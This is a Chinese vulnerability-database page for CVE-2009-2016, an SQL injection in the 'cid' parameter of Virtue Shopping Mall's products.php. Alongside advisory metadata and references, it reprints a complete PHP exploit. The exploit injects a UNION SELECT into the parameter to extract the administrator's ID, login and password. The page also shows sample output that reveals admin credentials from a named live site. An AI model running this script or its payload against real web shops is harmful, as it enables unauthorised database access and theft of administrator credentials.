Virtue Shopping Mall 'products.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117923 漏洞类型 SQL注入
发布时间 2009-06-08 更新时间 2009-06-19
CVE编号 CVE-2009-2016 CNNVD-ID CNNVD-200906-127
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8894
https://cxsecurity.com/issue/WLB-2009060129
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-127
|漏洞详情
VirtueShoppingMall的products.php中存在SQL注入漏洞。远程攻击者可以借助cid参数,执行任意SQL指令。
|漏洞EXP
CMS : Virtue Shopping Mall
WEB  : http://www.virtuenetz.com/mall/
Archivo : products.php
Variable Tipo : GET
valor : cid
Tipo : SQL Injection
URL : http://www.site.com/products.php?cid=[SQLI]

Exploit :
<?
$web  = $argv[1];
$url = $web."/products.php?cid=8+and+1=0+union+select+all+concat(0x756E646572,id,0x3A,login,0x3A,password,0x736563)+from+admin+limit+0,1";
preg_match_all("/under(.*)sec/",file_get_contents($url),$salida, PREG_PATTERN_ORDER);
$info = explode(":",$salida[1][0]);
echo "ID :".$info[0]."\n";
echo "Usuario : ".$info[1]."\n";
echo "Password : ".$info[2]."\n";
?>


undersec@Undersec:~/Escritorio$ php exploit.php http://www.virtuenetz.com/mall/

ID :1
Usuario : admin
Password : admin

Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.

100% CHILE
WWW.UNDERSECURITY.NET

# milw0rm.com [2009-06-08]
|参考资料

来源:VUPEN
名称:ADV-2009-1527
链接:http://www.vupen.com/english/advisories/2009/1527
来源:MILW0RM
名称:8894
链接:http://www.milw0rm.com/exploits/8894
来源:SECUNIA
名称:35374
链接:http://secunia.com/advisories/35374